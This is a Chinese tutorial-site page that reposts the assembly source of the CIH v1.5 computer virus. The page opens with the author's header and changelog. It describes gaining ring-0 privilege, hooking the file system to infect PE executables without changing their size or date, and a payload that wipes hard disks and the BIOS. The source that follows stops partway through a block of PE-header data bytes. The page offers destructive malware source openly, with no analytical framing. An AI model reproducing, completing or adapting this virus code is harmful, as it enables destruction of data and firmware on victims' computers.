• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • JavaScript
  • ASP.NET
  • PHP
  • 正则表达式
  • AJAX
  • JSP
  • ASP
  • Flex
  • XML
  • 编程技巧
  • Android
  • swift
  • C#教程
  • vb
  • vb.net
  • C语言
  • Java
  • Delphi
  • 易语言
  • vc/mfc
  • 嵌入式开发
  • 游戏开发
  • ios
  • 编程问答
  • 汇编语言
  • 微信小程序
  • 数据结构
  • OpenGL
  • 架构设计
  • qt
  • 微信公众号
您的位置:首页 > 程序设计 >汇编语言 > CIH V1.5版本病毒源码

CIH V1.5版本病毒源码

作者:匿名 字体:[增加 减小] 来源:互联网 时间:2017-06-28

匿名通过本文主要向大家介绍了cih病毒源码,cih病毒,cih是一种病毒,cih电脑病毒,cih病毒图片等相关知识,希望对您有所帮助,也希望大家支持linkedu.com www.linkedu.com
</div>

; ****************************************************************************
; *            The Virus Program Information           *
; ****************************************************************************
; *                                     *
; *  Designer : CIH          Source : TTIT of TATUNG in Taiwan  *
; *  Create Date : 04/26/1998     E-mail : WinCIH.Tatung@usa.net    *
; *  Modification Time : 06/01/1998  Version : 1.5             *
; *                                     *
; *  Turbo Assembler Version 5.0  : Tasm /m cih              *
; *  Turbo Link Version 5.01    : Tlink /3 /t cih, cih.exe       *
; *                                     *
; *==========================================================================*
; *            Modification History               *
; *==========================================================================*
; *   v1.0  1. Create the Virus Program.                 *
; *       2. The Virus Modifies IDT to Get Ring0 Privilege.      *
; * 04/26/1998 3. Virus Code doesn't Reload into System.          *
; *       4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *       5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; *       6. When System Opens Existing PE File, the File will be   *
; *        Infected, and the File doesn't be Reinfected.       *
; *       7. It is also Infected, even the File is Read-Only.     *
; *       8. When the File is Infected, the Modification Date and Time *
; *        of the File also don't be Changed.            *
; *       9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; *        Previous FileSystemApiHook, it will Call the Function   *
; *        that the IFS Manager Would Normally Call to Implement   *
; *        this Particular I/O Request.               *
; *      10. The Virus Size is only 656 Bytes.             *
; *==========================================================================*
; *   v1.1  1. Especially, the File that be Infected will not Increase  *
; *        it's Size...  ^__^                    *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.       *
; *        When Exception Error Occurs, Our OS System should be in  *
; *        Windows NT. So My Cute Virus will not Continue to Run,  *
; *        it will Jmup to Original Application to Run.       *
; *       3. Use Better Algorithm, Reduce Virus Code Size.       *
; *       4. The Virus "Basic" Size is only 796 Bytes.         *
; *==========================================================================*
; *   v1.2  1. Kill All HardDisk, and BIOS... Super... Killer...     *
; *       2. Modify the Bug of v1.1                  *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.           *
; *==========================================================================*
; *   v1.3  1. Modify the Bug that WinZip Self-Extractor Occurs Error.  *
; *        So When Open WinZip Self-Extractor ==> Don't Infect it.  *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.           *
; *==========================================================================*
; *   v1.4  1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *       2. Change the Date of Killing Computers.           *
; * 05/31/1998 3. Modify Virus Version Copyright.              *
; *       4. The Virus "Basic" Size is 1019 Bytes.           *
; ****************************************************************************
; *   v1.5  1. Full Modify the Bug : Change Harddisk Killing Port    *
; *       2. Modify Virus Version Copyright.              *
; * 06/01/1998 3. Clear Garbage in Source Code.               *
; *       4. The Virus "Small" Size in 10xx Bytes.           *
; ****************************************************************************
        .586
; ****************************************************************************
; *       Original PE Executable File(Don't Modify this Section)    *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
        db   04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
        db   004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
        db   0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
        db   00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
        db   021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
        db   069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
        db   061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
        db   074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
        db   020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
        db   06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
        db   024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
        db   0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
        db   00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
        db   000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
        db   000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
        db   004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
        db   000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
        db   000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
        db   000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
        db   000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
        db   000h, 00

分享到:QQ空间新浪微博腾讯微博微信百度贴吧QQ好友复制网址打印

您可能想查找下面的文章:

  • CIH V1.5版本病毒源码

相关文章

  • 2017-06-17计算机中数和字符的表示
  • 2017-06-28虚拟8086模式的内存管理
  • 2017-06-17I/O设备的数据传送方式
  • 2017-06-28汇编源码系列之cldoc12
  • 2017-06-28汇编源码系列之circle
  • 2017-06-28Game Faster V1.0
  • 2017-06-1780x86寻址方式
  • 2017-06-28如何使用DLL中的资源
  • 2017-06-28汇编创建简单的窗口
  • 2017-06-28汇编教程:Win32调试API(3)

文章分类

  • JavaScript
  • ASP.NET
  • PHP
  • 正则表达式
  • AJAX
  • JSP
  • ASP
  • Flex
  • XML
  • 编程技巧
  • Android
  • swift
  • C#教程
  • vb
  • vb.net
  • C语言
  • Java
  • Delphi
  • 易语言
  • vc/mfc
  • 嵌入式开发
  • 游戏开发
  • ios
  • 编程问答
  • 汇编语言
  • 微信小程序
  • 数据结构
  • OpenGL
  • 架构设计
  • qt
  • 微信公众号

最近更新的内容

    • 80386保护方式简介
    • MASM-两个16位二进制数减法模拟
    • Windows下的控制台输出
    • 汇编源码系列之sound
    • 循环程序设计
    • 汇编语言的艺术-准备工作(五)
    • 汇编源代码之GET TIME OF DAY(获取时间)
    • 虚拟设备驱动程序初步
    • 汇编源码系列之basmain
    • WIN98SE硬盘主引导记录代码反汇编分析

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有